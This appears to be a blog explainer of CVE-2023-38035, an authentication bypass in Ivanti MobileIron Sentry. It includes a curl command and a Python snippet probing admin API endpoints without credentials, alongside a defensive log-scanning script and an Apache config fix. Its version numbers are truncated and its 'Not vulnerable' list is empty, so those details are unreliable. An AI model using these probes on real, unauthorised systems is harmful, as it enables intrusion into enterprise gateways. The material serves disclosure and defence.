In 2023, a security weakness surfaced in the Ivanti MobileIron Sentry product, making waves in the IT security world. Tracked as CVE-2023-38035, this bug involved a simple misconfiguration in the Apache HTTPD server, which opened the door for attackers to bypass authentication and walk straight into the admin interface. If you’re running Ivanti MobileIron Sentry versions 9.18. or lower, this is a must-read.
What Is Ivanti MobileIron Sentry?
Ivanti MobileIron Sentry is designed to be a secure gateway for mobile device traffic within enterprise environments. It controls access to backend systems based on mobile device security status. Sentry is widely used in government, healthcare, and big businesses, making any security bug here a huge risk.
The Vulnerability: Insufficient HTTPD Restrictions
The core of CVE-2023-38035 is all about bad Apache HTTPD configuration. Ideally, sensitive endpoints—like the MICS Admin Portal—should be locked down and require authentication. But, older Sentry versions (9.18. and below) slipped: their config wasn't strict enough.
An attacker only needs access to the admin interface URL; if they find it, the server’s weak setup might let them in _without_ even needing to log in.
Below is a simplified breakdown of what was happening:
- The httpd.conf or related Apache config didn’t properly limit access to /mics* URLs.
- Instead of denying unauthenticated requests, it allowed GET/POST requests to sensitive endpoints.
- Attackers could send crafted requests to administrative paths, and the server didn't check authentication headers.
Impacted software:
- Ivanti MobileIron Sentry versions 9.18. and below
Not vulnerable:
Exploitation: How Would an Attacker Do It?
Attackers on the same network (or who found a Sentry admin interface exposed to the internet) could access admin functions with nothing more than a browser or simple tools like curl.
Here's how a basic exploitation might look:
# Example: Attempt to access the user listing without authentication
# (-k skips TLS certificate verification; port 8443 is the default MICS port in this example)
curl -k https://example.com:8443/mics/api/v1/users
If the server is vulnerable, it might respond with a list of users _without_ prompting for any authentication.
A more targeted exploit:
import requests

url = "https://victim-sentry.example.com:8443/mics/api/v1/admin"
# No authentication provided; verify=False skips TLS certificate checks
r = requests.get(url, verify=False)
print(r.status_code)  # A 200 here (rather than 401/403) indicates a vulnerable server
print(r.text)         # Should yield admin data if vulnerable
With unauthenticated admin access, an attacker could:
- Change server settings
- Add/delete user accounts
- Pivot laterally into other systems protected by Sentry
This is especially scary if your Sentry portals are exposed to the internet. Security companies like Rapid7 found over 1,200 vulnerable instances online when the CVE dropped.
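As an added defender-side example (not from the original post and not Ivanti's or Rapid7's code), the following checks Apache access logs for the symptom described above: a 2xx response on a /mics path to a request that carried no authenticated user. The log lines, hosts and the /mics prefix are constructed or assumed for illustration.

```python
import re
from dataclasses import dataclass

# Apache "combined" log format: host ident authuser [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Admin path prefixes that must require authentication (assumed; extend as needed)
ADMIN_PREFIXES = ("/mics",)

@dataclass
class Finding:
    host: str
    time: str
    method: str
    path: str
    status: int

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_unauthenticated_admin_hits(lines, trusted_hosts=frozenset()):
    """Return entries where an admin path answered 2xx to a request with no
    HTTP auth user ('-' in the authuser field) from a host outside trusted_hosts."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(ADMIN_PREFIXES):
            continue
        if rec["user"] != "-" or rec["host"] in trusted_hosts:
            continue
        status = int(rec["status"])
        if 200 <= status < 300:
            findings.append(Finding(rec["host"], rec["time"], rec["method"], rec["path"], status))
    return findings

# Constructed sample log lines (not real traffic)
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Aug/2023:10:01:02 +0000] "GET /mics/api/v1/users HTTP/1.1" 200 5120 "-" "curl/8.1.0"',
    '203.0.113.7 - - [21/Aug/2023:10:01:05 +0000] "GET /mics/api/v1/admin HTTP/1.1" 200 2048 "-" "python-requests/2.31"',
    '198.51.100.4 - admin [21/Aug/2023:10:02:00 +0000] "GET /mics/api/v1/users HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [21/Aug/2023:10:03:00 +0000] "GET /mics/api/v1/admin HTTP/1.1" 401 381 "-" "curl/8.1.0"',
    '203.0.113.9 - - [21/Aug/2023:10:04:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/8.1.0"',
]

if __name__ == "__main__":
    for f in find_unauthenticated_admin_hits(SAMPLE_LOG):
        print(f"ALERT {f.host} {f.method} {f.path} -> {f.status} at {f.time}")
```

On a patched server the same paths should log 401/403 for unauthenticated clients, so hits after the upgrade are worth a closer look.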
How To Fix
Ivanti released a security advisory and patches:
- Upgrade to Sentry 9.19. or later (Ivanti advisory)
Sample Apache Config Correction
# Lock down the MICS Admin API: every request under /mics must present valid credentials
<Location /mics>
    AuthType Basic
    AuthName "Restricted Access"
    AuthUserFile /etc/httpd/.htpasswd
    Require valid-user
</Location>
References & Further Reading
- NIST CVE-2023-38035
- Ivanti Security Advisory
- Rapid7 Exposure Report
- Horizon3 Attack Brief
Conclusion
CVE-2023-38035 serves as a reminder: even simple configuration mistakes, like failing to restrict HTTP endpoints, can lead to massive breaches. If you use Ivanti MobileIron Sentry, update _now_, and make sure your critical portals require strong authentication and aren’t internet-facing.
Stay patched. Stay safe.
Timeline
Published on: 08/21/2023 17:15:00 UTC
Last modified on: 08/24/2023 21:13:00 UTC